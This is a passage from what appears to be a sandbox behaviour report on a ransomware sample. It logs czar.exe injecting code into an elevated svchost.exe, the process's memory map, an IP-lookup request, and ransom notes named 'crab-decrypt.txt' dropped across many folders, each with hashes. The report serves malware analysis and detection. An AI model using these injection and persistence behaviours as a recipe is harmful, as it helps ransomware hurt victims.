Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	-	class_name = MyMainWnd, wndproc_parameter = 0	1	Fn
Create	-	class_name = MyMainWnd, wndproc_parameter = 0	1	Fn
Set Attribute	-	index = 0, new_long = 825373492	1	Fn
Set Attribute	-	class_name = MyMainWnd, index = 18446744073709551600, new_long = 1421869056	1	Fn

System (16)

Operation	Additional Information	Count	Logfile
Sleep	duration = 200 milliseconds (0.200 seconds)	1	Fn
Sleep	duration = 100 milliseconds (0.100 seconds)	6	Fn
Sleep	duration = 50 milliseconds (0.050 seconds)	3	Fn
Get Time	type = System Time, time = 2018-04-24 10:30:49 (UTC)	1	Fn
Get Time	type = Ticks, time = 99372	1	Fn
Get Time	type = System Time, time = 2018-04-24 10:30:50 (UTC)	1	Fn
Get Info	type = Operating System	2	Fn
Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Process #7: svchost.exe

8199

Information	Value
ID	#7
File Name	c:\windows\syswow64\svchost.exe
Command Line	C:\Windows\SysWOW64\svchost.exe
Initial Working Directory	C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor	Start Time: 00:00:38, Reason: Child Process
Unmonitor	End Time: 00:10:27, Reason: Terminated by Timeout
Monitor Duration	00:09:49

OS Process Information

Information	Value
PID	0xa88
Parent PID	0xa38 (c:\users\5p5nrg~1\appdata\local\temp\czar.exe)
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x A8C 0x A90 0x A94 0x A98 0x A9C 0x AA0 0x AA4 0x AA8 0x AAC 0x AB0 0x AB4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000020000	0x00020000	0x00034fff	Private Memory	Readable, Writable, Executable	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	-
private_0x0000000000070000	0x00070000	0x00080fff	Private Memory	Readable, Writable, Executable	-
locale.nls	0x00090000	0x000f6fff	Memory Mapped File	Readable	-
imm32.dll	0x00100000	0x0011dfff	Memory Mapped File	Readable	-
pagefile_0x0000000000100000	0x00100000	0x00106fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000110000	0x00110000	0x00111fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000120000	0x00120000	0x00120fff	Private Memory	Readable, Writable	-
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	Readable, Writable	-
private_0x0000000000130000	0x00130000	0x00130fff	Private Memory	Readable, Writable	-
private_0x0000000000130000	0x00130000	0x0013ffff	Private Memory	Readable, Writable	-
private_0x0000000000140000	0x00140000	0x00140fff	Private Memory	Readable, Writable	-
pagefile_0x0000000000140000	0x00140000	0x00146fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000150000	0x00150000	0x00150fff	Private Memory	Readable, Writable	-
pagefile_0x0000000000150000	0x00150000	0x00150fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000160000	0x00160000	0x00160fff	Private Memory	Readable, Writable, Executable	-
private_0x0000000000170000	0x00170000	0x00170fff	Private Memory	Readable, Writable	-
private_0x0000000000180000	0x00180000	0x00180fff	Private Memory	Readable, Writable	-
private_0x0000000000190000	0x00190000	0x00190fff	Private Memory	Readable, Writable	-
private_0x00000000001a0000	0x001a0000	0x001dffff	Private Memory	Readable, Writable	-
private_0x00000000001e0000	0x001e0000	0x0021ffff	Private Memory	Readable, Writable	-
rsaenh.dll	0x00220000	0x0025bfff	Memory Mapped File	Readable	-
private_0x0000000000220000	0x00220000	0x00220fff	Private Memory	Readable, Writable	-
private_0x0000000000230000	0x00230000	0x00230fff	Private Memory	Readable, Writable	-
private_0x0000000000240000	0x00240000	0x00240fff	Private Memory	Readable, Writable	-
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable	-
private_0x0000000000260000	0x00260000	0x0029ffff	Private Memory	Readable, Writable	-
private_0x0000000000260000	0x00260000	0x00260fff	Private Memory	Readable, Writable	-
private_0x0000000000270000	0x00270000	0x00270fff	Private Memory	Readable, Writable	-
private_0x0000000000280000	0x00280000	0x00280fff	Private Memory	Readable, Writable	-
private_0x0000000000290000	0x00290000	0x00290fff	Private Memory	Readable, Writable	-
private_0x00000000002a0000	0x002a0000	0x002affff	Private Memory	Readable, Writable	-
pagefile_0x00000000002a0000	0x002a0000	0x002a6fff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000000002a0000	0x002a0000	0x002a0fff	Private Memory	Readable, Writable	-
pagefile_0x00000000002b0000	0x002b0000	0x002b6fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x00000000002b0000	0x002b0000	0x002b1fff	Pagefile Backed Memory	Readable	-
windowsshell.manifest	0x002c0000	0x002c0fff	Memory Mapped File	Readable	-
index.dat	0x002c0000	0x002c7fff	Memory Mapped File	Readable, Writable	-
pagefile_0x00000000002d0000	0x002d0000	0x002d1fff	Pagefile Backed Memory	Readable	-
private_0x00000000002e0000	0x002e0000	0x0031ffff	Private Memory	Readable, Writable	-
index.dat	0x00320000	0x00333fff	Memory Mapped File	Readable, Writable	-
index.dat	0x00340000	0x0034ffff	Memory Mapped File	Readable, Writable	-
private_0x0000000000350000	0x00350000	0x0038ffff	Private Memory	Readable, Writable	-
private_0x0000000000390000	0x00390000	0x00392fff	Private Memory	Readable, Writable, Executable	-
private_0x00000000003a0000	0x003a0000	0x003a2fff	Private Memory	Readable, Writable, Executable	-
private_0x00000000003b0000	0x003b0000	0x003effff	Private Memory	Readable, Writable	-
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	Readable, Writable	-
private_0x0000000000400000	0x00400000	0x00400fff	Private Memory	Readable, Writable	-
pagefile_0x0000000000400000	0x00400000	0x00400fff	Pagefile Backed Memory	Readable	-
private_0x0000000000410000	0x00410000	0x0048ffff	Private Memory	Readable, Writable	-
private_0x0000000000490000	0x00490000	0x004cffff	Private Memory	Readable, Writable	-
private_0x00000000004d0000	0x004d0000	0x005effff	Private Memory	Readable, Writable	-
pagefile_0x00000000004d0000	0x004d0000	0x004d0fff	Pagefile Backed Memory	Readable	-
private_0x00000000004e0000	0x004e0000	0x0051ffff	Private Memory	Readable, Writable	-
private_0x0000000000520000	0x00520000	0x0053ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000520000	0x00520000	0x00520fff	Pagefile Backed Memory	Readable	-
private_0x0000000000540000	0x00540000	0x0057ffff	Private Memory	Readable, Writable	-
private_0x00000000005b0000	0x005b0000	0x005effff	Private Memory	Readable, Writable	-
private_0x0000000000600000	0x00600000	0x006fffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000700000	0x00700000	0x00887fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000890000	0x00890000	0x00a10fff	Pagefile Backed Memory	Readable	-
private_0x0000000000a60000	0x00a60000	0x00a9ffff	Private Memory	Readable, Writable	-
svchost.exe	0x00ac0000	0x00ac7fff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x0000000000ad0000	0x00ad0000	0x01ecffff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000001ed0000	0x01ed0000	0x022c2fff	Pagefile Backed Memory	Readable	-
sortdefault.nls	0x022d0000	0x0259efff	Memory Mapped File	Readable	-
private_0x00000000025a0000	0x025a0000	0x025dffff	Private Memory	Readable, Writable	-
private_0x00000000025e0000	0x025e0000	0x0261ffff	Private Memory	Readable, Writable	-
private_0x0000000002680000	0x02680000	0x026bffff	Private Memory	Readable, Writable	-
private_0x00000000026d0000	0x026d0000	0x0270ffff	Private Memory	Readable, Writable	-
private_0x0000000002710000	0x02710000	0x0274ffff	Private Memory	Readable, Writable	-
private_0x0000000002750000	0x02750000	0x0280ffff	Private Memory	Readable, Writable	-
private_0x0000000002810000	0x02810000	0x029bffff	Private Memory	Readable, Writable	-
private_0x0000000002830000	0x02830000	0x0286ffff	Private Memory	Readable, Writable	-
private_0x0000000002870000	0x02870000	0x0296ffff	Private Memory	Readable, Writable	-
private_0x0000000002a00000	0x02a00000	0x02a3ffff	Private Memory	Readable, Writable	-
fwpuclnt.dll	0x74db0000	0x74de7fff	Memory Mapped File	Readable, Writable, Executable	-
wship6.dll	0x74df0000	0x74df5fff	Memory Mapped File	Readable, Writable, Executable	-
wshtcpip.dll	0x74e00000	0x74e04fff	Memory Mapped File	Readable, Writable, Executable	-
winrnr.dll	0x74e10000	0x74e17fff	Memory Mapped File	Readable, Writable, Executable	-
mswsock.dll	0x74e20000	0x74e5bfff	Memory Mapped File	Readable, Writable, Executable	-
pnrpnsp.dll	0x74e60000	0x74e71fff	Memory Mapped File	Readable, Writable, Executable	-
napinsp.dll	0x74e80000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	-
rasadhlp.dll	0x74ed0000	0x74ed5fff	Memory Mapped File	Readable, Writable, Executable	-
nlaapi.dll	0x74ee0000	0x74eeffff	Memory Mapped File	Readable, Writable, Executable	-
sensapi.dll	0x74ef0000	0x74ef5fff	Memory Mapped File	Readable, Writable, Executable	-
rasapi32.dll	0x74f00000	0x74f51fff	Memory Mapped File	Readable, Writable, Executable	-
rsaenh.dll	0x74f70000	0x74faafff	Memory Mapped File	Readable, Writable, Executable	-
cryptsp.dll	0x74fb0000	0x74fc5fff	Memory Mapped File	Readable, Writable, Executable	-
rtutils.dll	0x74fd0000	0x74fdcfff	Memory Mapped File	Readable, Writable, Executable	-
rasman.dll	0x74fe0000	0x74ff4fff	Memory Mapped File	Readable, Writable, Executable	-
iphlpapi.dll	0x75040000	0x7505bfff	Memory Mapped File	Readable, Writable, Executable	-
comctl32.dll	0x75060000	0x751fdfff	Memory Mapped File	Readable, Writable, Executable	-
winnsi.dll	0x755b0000	0x755b6fff	Memory Mapped File	Readable, Writable, Executable	-
dnsapi.dll	0x755c0000	0x75603fff	Memory Mapped File	Readable, Writable, Executable	-
profapi.dll	0x75610000	0x7561afff	Memory Mapped File	Readable, Writable, Executable	-
wow64cpu.dll	0x756d0000	0x756d7fff	Memory Mapped File	Readable, Writable, Executable	-
wow64win.dll	0x756e0000	0x7573bfff	Memory Mapped File	Readable, Writable, Executable	-
wow64.dll	0x75740000	0x7577efff	Memory Mapped File	Readable, Writable, Executable	-
cryptbase.dll	0x75980000	0x7598bfff	Memory Mapped File	Readable, Writable, Executable	-
sspicli.dll	0x75990000	0x759effff	Memory Mapped File	Readable, Writable, Executable	-
sechost.dll	0x75a30000	0x75a48fff	Memory Mapped File	Readable, Writable, Executable	-
nsi.dll	0x75a50000	0x75a55fff	Memory Mapped File	Readable, Writable, Executable	-
crypt32.dll	0x75a60000	0x75b7cfff	Memory Mapped File	Readable, Writable, Executable	-
kernelbase.dll	0x75bb0000	0x75bf5fff	Memory Mapped File	Readable, Writable, Executable	-
iertutil.dll	0x75dd0000	0x75fcafff	Memory Mapped File	Readable, Writable, Executable	-
kernel32.dll	0x75fd0000	0x760dffff	Memory Mapped File	Readable, Writable, Executable	-
advapi32.dll	0x760e0000	0x7617ffff	Memory Mapped File	Readable, Writable, Executable	-
shlwapi.dll	0x76180000	0x761d6fff	Memory Mapped File	Readable, Writable, Executable	-
urlmon.dll	0x76240000	0x76375fff	Memory Mapped File	Readable, Writable, Executable	-
ws2_32.dll	0x76380000	0x763b4fff	Memory Mapped File	Readable, Writable, Executable	-
lpk.dll	0x763c0000	0x763c9fff	Memory Mapped File	Readable, Writable, Executable	-
msasn1.dll	0x763d0000	0x763dbfff	Memory Mapped File	Readable, Writable, Executable	-
user32.dll	0x763e0000	0x764dffff	Memory Mapped File	Readable, Writable, Executable	-
oleaut32.dll	0x764e0000	0x7656efff	Memory Mapped File	Readable, Writable, Executable	-
wininet.dll	0x76570000	0x76664fff	Memory Mapped File	Readable, Writable, Executable	-
msvcrt.dll	0x76670000	0x7671bfff	Memory Mapped File	Readable, Writable, Executable	-
msctf.dll	0x76720000	0x767ebfff	Memory Mapped File	Readable, Writable, Executable	-
clbcatq.dll	0x76890000	0x76912fff	Memory Mapped File	Readable, Writable, Executable	-
shell32.dll	0x76920000	0x77569fff	Memory Mapped File	Readable, Writable, Executable	-
imm32.dll	0x77570000	0x775cffff	Memory Mapped File	Readable, Writable, Executable	-
rpcrt4.dll	0x775d0000	0x776bffff	Memory Mapped File	Readable, Writable, Executable	-
ole32.dll	0x776c0000	0x7781bfff	Memory Mapped File	Readable, Writable, Executable	-
gdi32.dll	0x77820000	0x778affff	Memory Mapped File	Readable, Writable, Executable	-
usp10.dll	0x77990000	0x77a2cfff	Memory Mapped File	Readable, Writable, Executable	-
private_0x0000000077a30000	0x77a30000	0x77b4efff	Private Memory	Readable, Writable, Executable	-
private_0x0000000077b50000	0x77b50000	0x77c49fff	Private Memory	Readable, Writable, Executable	-
ntdll.dll	0x77c50000	0x77df8fff	Memory Mapped File	Readable, Writable, Executable	-
normaliz.dll	0x77e00000	0x77e02fff	Memory Mapped File	Readable, Writable, Executable	-
ntdll.dll	0x77e30000	0x77faffff	Memory Mapped File	Readable, Writable, Executable	-
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	Readable, Writable	-
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	-
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	-
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	-
For performance reasons, the remaining 174 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#6: c:\users\5p5nrg~1\appdata\local\temp\czar.exe	0xa3c	address = 0x70000, size = 68096	1	Fn Data
Modify Memory	#6: c:\users\5p5nrg~1\appdata\local\temp\czar.exe	0xa3c	address = 0xac2104, size = 1	1	Fn Data
Modify Memory	#6: c:\users\5p5nrg~1\appdata\local\temp\czar.exe	0xa3c	address = 0xac2105, size = 4	1	Fn Data
Modify Memory	#6: c:\users\5p5nrg~1\appdata\local\temp\czar.exe	0xa3c	address = 0xac2109, size = 1	1	Fn Data

Created Files

Filename	File Size	Hash Values	Actions
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\pmmr5k9k\ipv4bot_whatismyipaddress_com[1].htm	0.01 KB	MD5: 702bfd9bc090f7c6106830277f12bf2c SHA1: 5e94ae4f12657bc092f3cc7fac62d6444bcd8a61 SHA256: 299a31b4aa12e11e6144a416b1b50b9178c56b3b50f9dc448d5781cd81c6b85d	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\pmmr5k9k\eighpheighge[1].htm	0.54 KB	MD5: 62a5fed10a181841d936b51b2bf269f1 SHA1: e09d94e209fbf06946b8068922148d4b721407b2 SHA256: c9930e6ee3a2e086e1266841c5561baf6b730da59600ae30580a1f2770b7f866	... File Actions Show Properties Download
c:\crab-decrypt.txt	4.19 KB	MD5: 41dc497fc38c5cb08ca9943bd5b7e48a SHA1: aa6c9adcd4f365ebaebc61329eddcfcea2c5076d SHA256: 6fe46e12f2206dc3c868ccfce0c33c6d1afbb1ef627ccaa8054d53344be44b8d	... File Actions Show Properties Download
c:\$recycle.bin\crab-decrypt.txt	4.19 KB	MD5: 41dc497fc38c5cb08ca9943bd5b7e48a SHA1: aa6c9adcd4f365ebaebc61329eddcfcea2c5076d SHA256: 6fe46e12f2206dc3c868ccfce0c33c6d1afbb1ef627ccaa8054d53344be44b8d	... File Actions Show Properties Download
c:\$recycle.bin\s-1-5-21-3388679973-3930757225-3770151564-1000\crab-decrypt.txt	4.19 KB	MD5: 41dc497fc38c5cb08ca9943bd5b7e48a SHA1: aa6c9adcd4f365ebaebc61329eddcfcea2c5076d SHA256: 6fe46e12f2206dc3c868ccfce0c33c6d1afbb1ef627ccaa8054d53344be44b8d	... File Actions Show Properties Download
c:\config.msi\crab-decrypt.txt	4.19 KB	MD5: 41dc497fc38c5cb08ca9943bd5b7e48a SHA1: aa6c9adcd4f365ebaebc61329eddcfcea2c5076d SHA256: 6fe46e12f2206dc3c868ccfce0c33c6d1afbb1ef627ccaa8054d53344be44b8d	... File Actions Show Properties Download
c:\users\crab-decrypt.txt	4.19 KB	MD5: 41dc497fc38c5cb08ca9943bd5b7e48a SHA1: aa6c9adcd4f365ebaebc61329eddcfcea2c5076d SHA256: 6fe46e12f2206dc3c868ccfce0c33c6d1afbb1ef627ccaa8054d53344be44b8d	... File Actions Show Properties Download
c:\msocache\crab-decrypt.txt	4.19 KB	MD5: 41dc497fc38c5cb08ca9943bd5b7e48a SHA1: aa6c9adcd4f365ebaebc61329eddcfcea2c5076d SHA256: 6fe46e12f2206dc3c868ccfce0c33c6d1afbb1ef627ccaa8054d53344be44b8d	... File Actions Show Properties Download
c:\perflogs\crab-decrypt.txt	4.19 KB	MD5: 41dc497fc38c5cb08ca9943bd5b7e48a SHA1: aa6c9adcd4f365ebaebc61329eddcfcea2c5076d SHA256: 6fe46e12f2206dc3c868ccfce0c33c6d1afbb1ef627ccaa8054d53344be44b8d	... File Actions Show Properties Download
c:\perflogs\admin\crab-decrypt.txt	4.19 KB	MD5: 41dc497fc38c5cb08ca9943bd5b7e48a SHA1: aa6c9adcd4f365ebaebc61329eddcfcea2c5076d SHA256: 6fe46e12f2206dc3c868ccfce0c33c6d1afbb1ef627ccaa8054d53344be44b8d	... File Actions Show Properties Download
c:\program files\crab-decrypt.txt	4.19 KB	MD5: 41dc497fc38c5cb08ca9943bd5b7e48a SHA1: aa6c9adcd4f365ebaebc61329eddcfcea2c5076d SHA256: 6fe46e12f2206dc3c868ccfce0c33c6d1afbb1ef627ccaa8054d53344be44b8d	... File Actions Show Properties Download
c:\program files\microsoft sql server compact edition\crab-decrypt.txt	4.19 KB	MD5: 41dc497fc38c5cb08ca9943bd5b7e48a SHA1: aa6c9adcd4f365ebaebc61329eddcfcea2c5076d SHA256: 6fe46e12f2206dc3c868ccfce0c33c6d1afbb1ef627ccaa8054d53344be44b8d	... File Actions Show Properties Download
